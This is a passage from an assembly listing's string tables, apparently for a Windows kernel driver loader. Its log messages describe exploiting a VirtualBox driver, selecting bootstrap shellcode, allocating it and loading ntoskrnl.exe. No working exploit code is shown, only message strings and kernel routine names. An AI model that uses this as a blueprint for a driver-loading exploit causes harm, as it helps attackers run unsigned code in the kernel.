DB 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o'
DB 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H
DB 'e', 00H, 'r', 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k'
DB 00H, 'u', 00H, 'p', 00H, ' ', 00H, 'd', 00H, 'o', 00H, 'n', 00H
DB 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
CONST SEGMENT
??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i'
DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'o', 00H, 'i', 00H
DB 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't'
DB 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H
DB ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r'
DB 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H
DB 'p', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
CONST SEGMENT
??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v'
DB 00H, ',', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'n', 00H, 'n', 00H
DB 'o', 00H, 't', 00H, ' ', 00H, 'c', 00H, 'o', 00H, 'n', 00H, 't'
DB 00H, 'i', 00H, 'n', 00H, 'u', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
CONST SEGMENT
??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't'
DB 00H, 'L', 00H, 'w', 00H, 'f', 00H, ',', 00H, ' ', 00H, 'c', 00H
DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c'
DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H
DB 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@
CONST SEGMENT
??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ DB 'V'
DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't', 00H
DB 'L', 00H, 'w', 00H, 'f', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
CONST SEGMENT
??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't'
DB 00H, 'A', 00H, 'd', 00H, 'p', 00H, ',', 00H, ' ', 00H, 'c', 00H
DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c'
DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H
DB 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@
CONST SEGMENT
??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ DB 'V'
DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't', 00H
DB 'A', 00H, 'd', 00H, 'p', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
CONST SEGMENT
??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'U', 00H, 'S', 00H, 'B'
DB 00H, 'M', 00H, 'o', 00H, 'n', 00H, ',', 00H, ' ', 00H, 'c', 00H
DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c'
DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H
DB 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@
CONST SEGMENT
??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ DB 'V'
DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'U', 00H, 'S', 00H, 'B', 00H
DB 'M', 00H, 'o', 00H, 'n', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@
CONST SEGMENT
??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'A', 00H, 'c', 00H
DB 't', 00H, 'i', 00H, 'v', 00H, 'e', 00H, ' ', 00H, 'V', 00H, 'i'
DB 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H
DB 'o', 00H, 'x', 00H, ' ', 00H, 'f', 00H, 'o', 00H, 'u', 00H, 'n'
DB 00H, 'd', 00H, ' ', 00H, 'i', 00H, 'n', 00H, ' ', 00H, 's', 00H
DB 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, ',', 00H, ' '
DB 00H, 'a', 00H, 't', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'p', 00H
DB 't', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o', 00H, 'p', 00H, ' '
DB 00H, '(', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H
DB 'd', 00H, ')', 00H, ' ', 00H, 'i', 00H, 't', 00H, ' ', 00H, 'd'
DB 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 's', 00H
DB 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@
CONST SEGMENT
??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ DB '\', 00H, 'D', 00H
DB 'e', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@
CONST SEGMENT
??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ DB 'V', 00H, 'B', 00H
DB 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@
CONST SEGMENT
??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'o', 00H, 'p', 00H, 'e'
DB 00H, 'n', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'S', 00H
DB 'C', 00H, 'M', 00H, ' ', 00H, 'd', 00H, 'a', 00H, 't', 00H, 'a'
DB 00H, 'b', 00H, 'a', 00H, 's', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@
CONST SEGMENT
??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a'
DB 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H
DB 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B'
DB 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H
DB 'v', 00H, 'e', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'G', 00H, 'e'
DB 00H, 't', 00H, 'S', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H
DB 'm', 00H, 'D', 00H, 'i', 00H, 'r', 00H, 'e', 00H, 'c', 00H, 't'
DB 00H, 'o', 00H, 'r', 00H, 'y', 00H, ' ', 00H, 'f', 00H, 'a', 00H
DB 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@
CONST SEGMENT
??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'x', 00H
DB 'e', 00H, 'c', 00H, 'u', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'g'
DB 00H, ' ', 00H, 'e', 00H, 'x', 00H, 'p', 00H, 'l', 00H, 'o', 00H
DB 'i', 00H, 't', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@
CONST SEGMENT
??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'R', 00H, 'e', 00H
DB 's', 00H, 'o', 00H, 'l', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g'
DB 00H, ' ', 00H, 'k', 00H, 'e', 00H, 'r', 00H, 'n', 00H, 'e', 00H
DB 'l', 00H, ' ', 00H, 'i', 00H, 'm', 00H, 'p', 00H, 'o', 00H, 'r'
DB 00H, 't', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@
CONST SEGMENT
??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'i', 00H
DB 'n', 00H, 'd', 00H, 'o', 00H, 'w', 00H, 's', 00H, ' ', 00H, '1'
DB 00H, '0', 00H, ' ', 00H, 'R', 00H, 'S', 00H, '2', 00H, '+', 00H
DB ' ', 00H, 'b', 00H, 'o', 00H, 'o', 00H, 't', 00H, 's', 00H, 't'
DB 00H, 'r', 00H, 'a', 00H, 'p', 00H, ' ', 00H, 's', 00H, 'h', 00H
DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e'
DB 00H, ' ', 00H, 's', 00H, 'e', 00H, 'l', 00H, 'e', 00H, 'c', 00H
DB 't', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@
CONST SEGMENT
??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'e', 00H
DB 'f', 00H, 'a', 00H, 'u', 00H, 'l', 00H, 't', 00H, ' ', 00H, 'b'
DB 00H, 'o', 00H, 'o', 00H, 't', 00H, 's', 00H, 't', 00H, 'r', 00H
DB 'a', 00H, 'p', 00H, ' ', 00H, 's', 00H, 'h', 00H, 'e', 00H, 'l'
DB 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e', 00H, ' ', 00H
DB 's', 00H, 'e', 00H, 'l', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e'
DB 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@
CONST SEGMENT
??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'h', 00H
DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e'
DB 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H
DB 'a', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't'
DB 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@
CONST SEGMENT
??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'u', 00H, 'n'
DB 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H, ' ', 00H, 't', 00H
DB 'o', 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c'
DB 00H, 'a', 00H, 't', 00H, 'e', 00H, ' ', 00H, 's', 00H, 'h', 00H
DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e'
DB 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@
CONST SEGMENT
??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'Z', 00H, 'w', 00H
DB 'C', 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H, '0'
DB 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@
CONST SEGMENT
??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'Z', 00H, 'w'
DB 00H, 'C', 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H
DB 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's', 00H, 's'
DB 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'f', 00H
DB 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_07IPICGNAN@ZwClose@
CONST SEGMENT
??_C@_07IPICGNAN@ZwClose@ DB 'ZwClose', 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@
CONST SEGMENT
??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'P', 00H, 's', 00H
DB 'C', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 't', 00H, 'e', 00H, 'S'
DB 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'T', 00H
DB 'h', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 'd', 00H, ' ', 00H, '0'
DB 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@
CONST SEGMENT
??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'P', 00H, 's'
DB 00H, 'C', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 't', 00H, 'e', 00H
DB 'S', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'T'
DB 00H, 'h', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 'd', 00H, ' ', 00H
DB 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's', 00H, 's'
DB 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'f', 00H
DB 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@
CONST SEGMENT
??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ DB 'PsCreateSystemThread', 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@
CONST SEGMENT
??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'x', 00H
DB 'A', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H, 'a', 00H, 't'
DB 00H, 'e', 00H, 'P', 00H, 'o', 00H, 'o', 00H, 'l', 00H, 'W', 00H
DB 'i', 00H, 't', 00H, 'h', 00H, 'T', 00H, 'a', 00H, 'g', 00H, ' '
DB 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@
CONST SEGMENT
??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'E', 00H, 'x'
DB 00H, 'A', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H, 'a', 00H
DB 't', 00H, 'e', 00H, 'P', 00H, 'o', 00H, 'o', 00H, 'l', 00H, 'W'
DB 00H, 'i', 00H, 't', 00H, 'h', 00H, 'T', 00H, 'a', 00H, 'g', 00H
DB ' ', 00H, 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's'
DB 00H, 's', 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H
DB 'f', 00H, 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@
CONST SEGMENT
??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ DB 'ExAllocatePoolWithTag', 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@
CONST SEGMENT
??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'n', 00H, 't', 00H
DB 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H, 'l', 00H, '.'
DB 00H, 'e', 00H, 'x', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H
DB 'a', 00H, 'd', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't'
DB 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
CONST SEGMENT
??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i'
DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H
DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'n', 00H, 't'
DB 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H, 'l', 00H
DB '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@
CONST SEGMENT
??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ DB 'n'
DB 00H, 't', 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H
DB 'l', 00H, '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@
CONST SEGMENT
??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'L', 00H, 'o', 00H
DB 'a', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'n'
DB 00H, 't', 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H
